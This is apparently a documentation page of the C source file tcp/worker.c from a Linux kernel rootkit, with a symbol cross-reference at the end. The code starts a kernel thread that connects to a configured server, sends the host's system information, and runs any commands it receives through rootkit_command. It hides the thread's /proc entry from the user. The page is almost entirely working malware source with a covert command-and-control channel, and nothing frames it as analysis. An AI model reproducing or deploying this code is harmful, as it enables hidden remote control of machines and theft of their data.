d4/d33/tcp_2worker_8c_source.html

#include "hide_api.h"

#include "network.h"

#include "sysinfo.h"

#include "upload.h"


static bool is_auth = false;

static struct task_struct *network_worker_thread = NULL;


bool is_user_auth(void) {

    return is_auth;

}


int set_user_auth(bool auth) {

    is_auth = auth;

    return is_auth;

}


static bool send_initial_message_with_retries(void) {

    char *sysinfo = get_sysinfo();


    if (!sysinfo) {

        ERR_MSG("send_initial_message_with_retries: failed to get system info\n");

        return false;

    }


    for (int attempts = 0; attempts < MAX_MSG_SEND_OR_RECEIVE_ERROR; attempts++) {

        if (send_to_server(TCP, sysinfo) == SUCCESS) {

            kfree(sysinfo);

            return true;

        }

        msleep(TIMEOUT_BEFORE_RETRY);

    }

    kfree(sysinfo);

    return false;

}


static bool receive_loop(char *recv_buffer) {

    unsigned failure_count = 0, empty_count = 0;


    while (!kthread_should_stop()) {

        // Clear the buffer before receiving

        memset(recv_buffer, 0, RCV_CMD_BUFFER_SIZE);


        int len = receive_from_server(recv_buffer, RCV_CMD_BUFFER_SIZE);

        if (receiving_file) {

            failure_count = 0;

            msleep(TIMEOUT_BEFORE_RETRY);

            continue;

        }


        if (len <= 0) {

            if (++failure_count > MAX_MSG_SEND_OR_RECEIVE_ERROR)

                return false;

            msleep(TIMEOUT_BEFORE_RETRY);

            continue;

        }


        if (recv_buffer[0] == '\0') {

            if (++empty_count > MAX_MSG_SEND_OR_RECEIVE_ERROR)

                return false;

            continue;

        }


        if (len < RCV_CMD_BUFFER_SIZE)

            recv_buffer[len] = '\0';

        else

            recv_buffer[RCV_CMD_BUFFER_SIZE - 1] = '\0';

        failure_count = empty_count = 0;


        DBG_MSG("network_worker: received message: %s\n", recv_buffer);

        if (strcmp(recv_buffer, "\n") != 0) {

            rootkit_command(recv_buffer, len + 1, TCP);

        }

    }


    return true;

}


static int network_worker(void *data) {

    char *recv_buffer = NULL;

    struct sockaddr_in addr = { 0 };

    unsigned char ip_binary[4] = { 0 };


    if (!in4_pton(ip, -1, ip_binary, -1, NULL)) {

        ERR_MSG("network_worker: invalid IPv4 address\n");

        return -FAILURE;

    }


    addr.sin_family = AF_INET;

    addr.sin_port = htons(port);

    memcpy(&addr.sin_addr.s_addr, ip_binary, sizeof(addr.sin_addr.s_addr));


    while (!kthread_should_stop()) {

        close_worker_socket();


        if (connect_worker_socket_to_server(&addr) != SUCCESS) {

            msleep(TIMEOUT_BEFORE_RETRY);

            continue;

        }


        if (!send_initial_message_with_retries()) {

            msleep(TIMEOUT_BEFORE_RETRY);

            continue;

        }


        recv_buffer = kmalloc(RCV_CMD_BUFFER_SIZE + 1, GFP_KERNEL);

        if (!recv_buffer) {

            ERR_MSG("network_worker: failed to allocate recv_buffer\n");

            break;

        }


        if (!receive_loop(recv_buffer)) {

            kfree(recv_buffer);

            recv_buffer = NULL;

            set_user_auth(false);

            msleep(TIMEOUT_BEFORE_RETRY);

            continue;

        }


        break;

    }


    if (recv_buffer)

        kfree(recv_buffer);


    close_worker_socket();


    return SUCCESS;

}


int start_network_worker(void) {

    if (network_worker_thread && !IS_ERR(network_worker_thread)) {

        ERR_MSG("start_network_worker: thread already running\n");

        return -EBUSY;

    }


    network_worker_thread =

        kthread_run(network_worker, NULL, NETWORK_WORKER_THREAD_NAME);

    if (IS_ERR(network_worker_thread)) {

        ERR_MSG("start_network_worker: failed to start thread\n");

        return PTR_ERR(network_worker_thread);

    }


    // Hide the thread from the user

    char path[32] = { 0 };

    snprintf(path, sizeof(path), "/proc/%d", network_worker_thread->pid);

    hide_file(path);


    return SUCCESS;

}


int stop_network_worker(void) {

    if (!network_worker_thread || IS_ERR(network_worker_thread)) {

        return -EINVAL;

    }


    // Remove the hidden directory associated with the thread

    char path[32] = { 0 };

    snprintf(path, sizeof(path), "/proc/%d", network_worker_thread->pid);

    unhide_file(path);


    // Stop the network worker thread

    kthread_stop(network_worker_thread);

    network_worker_thread = NULL;


    return SUCCESS;

}


rootkit_command
int rootkit_command(char *command, unsigned command_size, enum Protocol protocol)
Definition cmd.c:122

TIMEOUT_BEFORE_RETRY
#define TIMEOUT_BEFORE_RETRY
Definition config.h:36

ERR_MSG
#define ERR_MSG(fmt, args...)
Definition config.h:16

DBG_MSG
#define DBG_MSG(fmt, args...)
Definition config.h:15

port
int port
Definition main.c:7

FAILURE
#define FAILURE
Definition config.h:6

NETWORK_WORKER_THREAD_NAME
#define NETWORK_WORKER_THREAD_NAME
Definition config.h:34

SUCCESS
#define SUCCESS
Definition config.h:5

TCP
@ TCP
Definition config.h:29

RCV_CMD_BUFFER_SIZE
#define RCV_CMD_BUFFER_SIZE
Definition config.h:37

MAX_MSG_SEND_OR_RECEIVE_ERROR
#define MAX_MSG_SEND_OR_RECEIVE_ERROR
Definition config.h:35

ip
char * ip
Definition main.c:6

hide_file
int hide_file(const char *path)
Definition hide_api.c:25

unhide_file
int unhide_file(const char *path)
Definition hide_api.c:52

hide_api.h

send_to_server
int send_to_server(enum Protocol protocol, char *message,...)
Definition network.c:67

receive_from_server
int receive_from_server(char *buffer, size_t max_len)
Definition network.c:200

network.h

close_worker_socket
int close_worker_socket(void)
Definition socket.c:43

connect_worker_socket_to_server
int connect_worker_socket_to_server(struct sockaddr_in *addr)
Definition socket.c:59

get_sysinfo
char * get_sysinfo(void)
Definition sysinfo.c:18

sysinfo.h

set_user_auth
int set_user_auth(bool auth)
Definition tcp/worker.c:22

receive_loop
static bool receive_loop(char *recv_buffer)
Definition tcp/worker.c:59

network_worker
static int network_worker(void *data)
Definition tcp/worker.c:106

start_network_worker
int start_network_worker(void)
Definition tcp/worker.c:161

send_initial_message_with_retries
static bool send_initial_message_with_retries(void)
Definition tcp/worker.c:33

network_worker_thread
static struct task_struct * network_worker_thread
Definition tcp/worker.c:7

is_auth
static bool is_auth
Definition tcp/worker.c:6

is_user_auth
bool is_user_auth(void)
Definition tcp/worker.c:13

stop_network_worker
int stop_network_worker(void)
Definition tcp/worker.c:185

upload.h

receiving_file
bool receiving_file
Definition upload.c:10